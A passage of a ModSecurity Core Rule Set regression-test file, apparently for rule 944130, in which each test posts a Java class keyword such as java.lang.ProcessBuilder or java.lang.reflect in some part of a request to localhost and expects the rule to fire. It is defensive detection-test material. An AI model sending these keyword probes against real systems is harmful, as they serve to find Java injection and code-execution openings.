"en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"java.lang.Integer\"}" output: log_contains: "id \"944130\"" - test_title: 944130-285 desc: "Content-Type application/json arg name includes keyword java.lang.Integer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"java.lang.Integer\": \"test\"}" output: log_contains: "id \"944130\"" - test_title: 944130-286 desc: "Argument test includes keyword java.lang.Number" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=java.lang.Number" output: log_contains: "id \"944130\"" - test_title: 944130-287 desc: "Argument name includes keyword java.lang.Number" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "java.lang.Number=test" output: log_contains: "id \"944130\"" - test_title: 944130-288 desc: "Cookie test includes keyword java.lang.Number" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=java.lang.Number method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-289 desc: "Cookie name includes keyword java.lang.Number" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: java.lang.Number=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-290 desc: "Request header test includes keyword java.lang.Number" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: java.lang.Number method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-291 desc: "XML attribute value includes keyword java.lang.Number" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944130\"" - test_title: 944130-292 desc: "XML element value includes keyword java.lang.Number" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.lang.Number" output: log_contains: "id \"944130\"" - test_title: 944130-293 desc: "Nested XML element value includes keyword java.lang.Number" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.lang.Number" output: log_contains: "id \"944130\"" - test_title: 944130-294 desc: "Content-Type text/plain includes keyword java.lang.Number" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=java.lang.Number" output: log_contains: "id \"944130\"" - test_title: 944130-295 desc: "Content-Type application/json arg value includes keyword java.lang.Number" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"java.lang.Number\"}" output: log_contains: "id \"944130\"" - test_title: 944130-296 desc: "Content-Type application/json arg name includes keyword java.lang.Number" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"java.lang.Number\": \"test\"}" output: log_contains: "id \"944130\"" - test_title: 944130-297 desc: "Argument test includes keyword java.lang.Object" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=java.lang.Object" output: log_contains: "id \"944130\"" - test_title: 944130-298 desc: "Argument name includes keyword java.lang.Object" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "java.lang.Object=test" output: log_contains: "id \"944130\"" - test_title: 944130-299 desc: "Cookie test includes keyword java.lang.Object" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=java.lang.Object method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-300 desc: "Cookie name includes keyword java.lang.Object" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: java.lang.Object=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-301 desc: "Request header test includes keyword java.lang.Object" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: java.lang.Object method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-302 desc: "XML attribute value includes keyword java.lang.Object" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944130\"" - test_title: 944130-303 desc: "XML element value includes keyword java.lang.Object" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.lang.Object" output: log_contains: "id \"944130\"" - test_title: 944130-304 desc: "Nested XML element value includes keyword java.lang.Object" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.lang.Object" output: log_contains: "id \"944130\"" - test_title: 944130-305 desc: "Content-Type text/plain includes keyword java.lang.Object" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=java.lang.Object" output: log_contains: "id \"944130\"" - test_title: 944130-306 desc: "Content-Type application/json arg value includes keyword java.lang.Object" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"java.lang.Object\"}" output: log_contains: "id \"944130\"" - test_title: 944130-307 desc: "Content-Type application/json arg name includes keyword java.lang.Object" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"java.lang.Object\": \"test\"}" output: log_contains: "id \"944130\"" - test_title: 944130-308 desc: "Argument test includes keyword java.lang.Process" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=java.lang.Process" output: log_contains: "id \"944130\"" - test_title: 944130-309 desc: "Argument name includes keyword java.lang.Process" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "java.lang.Process=test" output: log_contains: "id \"944130\"" - test_title: 944130-310 desc: "Cookie test includes keyword java.lang.Process" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=java.lang.Process method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-311 desc: "Cookie name includes keyword java.lang.Process" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: java.lang.Process=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-312 desc: "Request header test includes keyword java.lang.Process" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: java.lang.Process method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-313 desc: "XML attribute value includes keyword java.lang.Process" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944130\"" - test_title: 944130-314 desc: "XML element value includes keyword java.lang.Process" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.lang.Process" output: log_contains: "id \"944130\"" - test_title: 944130-315 desc: "Nested XML element value includes keyword java.lang.Process" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.lang.Process" output: log_contains: "id \"944130\"" - test_title: 944130-316 desc: "Content-Type text/plain includes keyword java.lang.Process" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=java.lang.Process" output: log_contains: "id \"944130\"" - test_title: 944130-317 desc: "Content-Type application/json arg value includes keyword java.lang.Process" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"java.lang.Process\"}" output: log_contains: "id \"944130\"" - test_title: 944130-318 desc: "Content-Type application/json arg name includes keyword java.lang.Process" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"java.lang.Process\": \"test\"}" output: log_contains: "id \"944130\"" - test_title: 944130-319 desc: "Argument test includes keyword java.lang.ProcessBuilder" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=java.lang.ProcessBuilder" output: log_contains: "id \"944130\"" - test_title: 944130-320 desc: "Argument name includes keyword java.lang.ProcessBuilder" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "java.lang.ProcessBuilder=test" output: log_contains: "id \"944130\"" - test_title: 944130-321 desc: "Cookie test includes keyword java.lang.ProcessBuilder" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=java.lang.ProcessBuilder method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-322 desc: "Cookie name includes keyword java.lang.ProcessBuilder" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: java.lang.ProcessBuilder=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-323 desc: "Request header test includes keyword java.lang.ProcessBuilder" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: java.lang.ProcessBuilder method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-324 desc: "XML attribute value includes keyword java.lang.ProcessBuilder" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944130\"" - test_title: 944130-325 desc: "XML element value includes keyword java.lang.ProcessBuilder" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.lang.ProcessBuilder" output: log_contains: "id \"944130\"" - test_title: 944130-326 desc: "Nested XML element value includes keyword java.lang.ProcessBuilder" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.lang.ProcessBuilder" output: log_contains: "id \"944130\"" - test_title: 944130-327 desc: "Content-Type text/plain includes keyword java.lang.ProcessBuilder" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=java.lang.ProcessBuilder" output: log_contains: "id \"944130\"" - test_title: 944130-328 desc: "Content-Type application/json arg value includes keyword java.lang.ProcessBuilder" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"java.lang.ProcessBuilder\"}" output: log_contains: "id \"944130\"" - test_title: 944130-329 desc: "Content-Type application/json arg name includes keyword java.lang.ProcessBuilder" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"java.lang.ProcessBuilder\": \"test\"}" output: log_contains: "id \"944130\"" - test_title: 944130-330 desc: "Argument test includes keyword java.lang.reflect" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=java.lang.reflect" output: log_contains: "id \"944130\"" - test_title: 944130-331 desc: "Argument name includes keyword java.lang.reflect" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "java.lang.reflect=test" output: log_contains: "id \"944130\"" - test_title: 944130-332 desc: "Cookie test includes keyword java.lang.reflect" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=java.lang.reflect method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-333 desc: "Cookie name includes keyword java.lang.reflect" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: java.lang.reflect=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-334 desc: "Request header test includes keyword java.lang.reflect" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: 